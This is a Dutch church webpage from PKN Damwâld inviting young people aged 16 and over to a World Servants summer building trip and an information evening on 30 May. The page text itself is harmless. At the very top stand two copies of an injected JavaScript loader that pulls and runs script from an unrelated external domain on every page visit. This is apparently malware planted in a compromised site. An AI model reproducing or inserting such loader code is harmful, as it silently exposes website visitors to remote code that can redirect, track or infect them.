;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ga jij mee bouwen aan verandering in een ontwikkelingsland? - PKN Damwâld

Ga jij mee bouwen aan verandering in een ontwikkelingsland?

Gepubliceerd op: donderdag 17 mei 2018

Afgelopen jaren zijn jongeren van onze kerk afgereisd naar Ecuador en Zambia om daar te bouwen aan een cacao opslag en kliniek. Een coole manier om te ervaren hoe is het om te leven in een ontwikkelingsland en zelf je handen uit de mouwen te steken! Maar jij kunt dit ook!

World Servants biedt jongeren (16+) de kans om in de zomervakantie drie weken lang te bouwen aan een school of kliniek in een ontwikkelingsland! Tijdens de reis ga je naast bouwen ervaren hoe de lokale cultuur is, ga je met kinderen knutselen en zingen, ga je mensen thuis bezoeken, zondags naar een lokale kerk, markt bezoeken en nog veel meer! Je gaat een geweldige tijd beleven die je nooit mee gaat vergeten! En het mooiste is, je bent voor de lokale bevolking heel waardevol, jij zorgt dat hun met de nieuwe school of kliniek weer een stap vooruit kunnen en een betere toekomst krijgen!

Woensdagavond 30 mei om 19:30 uur organiseert de World Servants groep van onze kerk een informatiebijeenkomst waarin ze alles gaan vertellen wat er komt kijken bij een World Servants project en hoe zij dit beleefd en ervaren hebben. Je krijgt veel informatie en je kunt al je vragen stellen. Tip: neem je ouders mee zodat ook zij al hun vragen kwijt kunnen!

Lijkt het jou cool om in de zomervakantie op reis te gaan naar een ontwikkelingsland om daar te bouwen aan verandering? Ga mee met World Servants!

Woensdagavond 30 mei om 19:30 uur in de Ontmoeting, tot dan!